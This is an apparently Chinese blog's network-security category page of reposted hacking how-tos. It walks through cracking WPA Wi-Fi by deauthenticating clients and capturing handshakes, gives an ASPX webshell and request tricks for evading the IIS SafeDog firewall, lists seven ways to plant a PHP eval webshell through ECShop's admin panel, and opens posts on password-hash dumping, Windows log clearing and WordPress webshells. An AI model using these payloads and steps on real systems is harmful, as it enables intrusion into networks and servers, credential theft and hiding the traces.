分类: 网络安全预览模式: 普通 | 列表

 虽然人们都说wpa的密码难破解,其实,嗯,确实是这样子,不仅仅靠技术,还要靠运气,这里就要用到一个强大的字典咯,木有一个好字典,破解密码灰常困难的说。好了,不卖关子了,说方法:

1.打开BT5的Wicd network manager,在application下的internet中。选择一个新号较好的AP(那样子用起来才爽嘛)。然后看它的properties,打开properties以后继续打开里面的属性看看这个AP的mac地址跟channel。

2.ifconfig看看自己的无线网卡的名称,一般是wlan0或者wifi0,后文中根据实际情况执行命令。

3.开启无线监控

airmon-ng start wlan0 6

注:wlan0为你的无线设备名称  6为你要开启的信道(但是这里的6其实并没有那么重要的说)

这一步你可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX    XXX为给出的进程号,然后重新执行上句直到不报错

4.因为我们已经选择好了目标,我们就直奔目标AP,开始用BT5对其进行监控

airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0

这时候你应该可以看到如下图示:

1

5.根据上图,我们可以找到四个Client客户端的MAC地址,从里面随便选个(最好选择活跃点儿的)。打开一个新的终端,上一个终端不要关闭,后面还需要用到。在新终端中输入:
aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0

执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么恭喜,你离成功已经不远了。如果没有出现就继续重复5的命令就ok了,直到出现握手。

6.对BT5握手抓到的包进行破解工作

aircrack-ng -w password.txt -b AP’s MAC nenew.cap

其中的password.txt为我们需要预置的字典文件,字典文件网上很多,搜搜就有了。奶牛也会放出自己的一些字典文件提供下载,继续关注咯。最后上成果图

本文只做技术讨论,不要用于非法用途,否则后果自负。

原文出自:http://blog.csdn.net/aniven/article/details/6748070

分类:网络安全 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1890

突破安全狗的一些记录

1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
 
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
 
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。 

 

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1342

ecshop后台拿shell 个人总结七种方法

 最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。

本人整理给自己看的,大家飘过就好。BY:黑猫

ecshop后台拿shell 个人总结七种方法

一、

系统==>数据库管理==>sql查询(可爆出物理路径):

==============创建表失败,导不出shell======================

show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
select cmd from a into outfile ‘导出路径’;
drop table if exists a;

==================创建表失败,导不出shell===================

二、

前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)

备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)

然后菜刀链接成功

http://www.webshell.cc/data/sqldata/x.php;.sql

三、

1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users”
(其中XXX因各站而异,是数据前缀)
3、备份文件名为mm.php;.sql
4、一句话客户端连接mm.php;.sql,地址一般为 http://www.webshell.cc/data/sqldata/mm.php;.sql

四、

模板管理==>库项目管理==>选择myship.lbi 配送方式。

在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>

菜刀链接http://www.webshell.cc/myship.php 成功。

说明:有些服务器过滤了eval 导致失败。

五、

http://www.webshell.cc/includes/fckeditor/editor/filemanager/connectors/test.html

代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为

http://www.webshell.cc/images/upload/Media/xxx.php

六、

上传txt 并且没有过滤任何函数.
于是运用到了php的文件操作…
<script language=”php”>$file = file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
if($file){
$file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
$newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
copy($file,$newfile);
}</script>

将以上代码插入库项目管理中的myship.ini
打开http://www.webshell.cc/myship.php
即在http://www.webshell.cc/data/目录下生成distant.php;a.txt
菜刀连接之…搞定..

七、

进入后台-系统设置-Flash播放器管理- 直接上传x.php

ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。

转载来的文章,还不错,原作者博客地址
ecshop后台拿shell 个人总结七种方法:http://www.webshell.cc/1625.html
 
 
分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1576

ASP手工注入

扔掉工具 跟我一起学ASP手工注入!
现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷!
   正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入 漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己想要的信息,是[被屏蔽的不受欢迎关键词]高shou 与小菜的根本区别!只用工具,而不去管它的原理,是不可能得到提高的,当然,在遇到一些特殊情况的时候,那些只会用工具的小菜们也只能放弃了!所以学会手 工注入自己构造SQL注入语句是一个黑客爱好者必上的一堂课!我希望这篇文章能够给那些还不会手工注入的朋友一点启发!帮助大家早日摆脱工具,早日踏入 [被屏蔽的不受欢迎关键词]高shou的行列!
恶补基础:
   要想学会手工注入,有一个名词是不得不提的,那就是数据库系统!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1455

Linux密码解密

BackTrack5(John the Ripper)
http://www.backtrack-linux.org

cd /pentest/passwords/john/
./unshadow /root/hack/passwd /root/hack/shadow > pw

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1838

Windows密码解密

1、GetHashes
pwdump7                    http://www.tarasco.org/security/pwdump_7/index.html
saminside                  http://www.insidepro.com/eng/saminside.shtml
Cain & Abel                http://www.oxid.it/cain.html

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2005

VBS清除Windows日志

strComputer= "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1867

wordpress后台GetWebshell

默认后台登录地址
/wp-admin/
/wp-login.php

方法一:

查看更多...

分类:网络安全 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1838

php.ini_AddFileToAnyPHP

;Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1564

ASP.NET安全设置防御ASPXSpy

终极防御(CmdShell、IIS Spy、Process、Services、UserInfo、SysInfo、RegShell)

可能影响个别网站正常运行,请测试网站无问题再正式使用这方法。

网站ASP.NET version切换成2.0.50727

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1524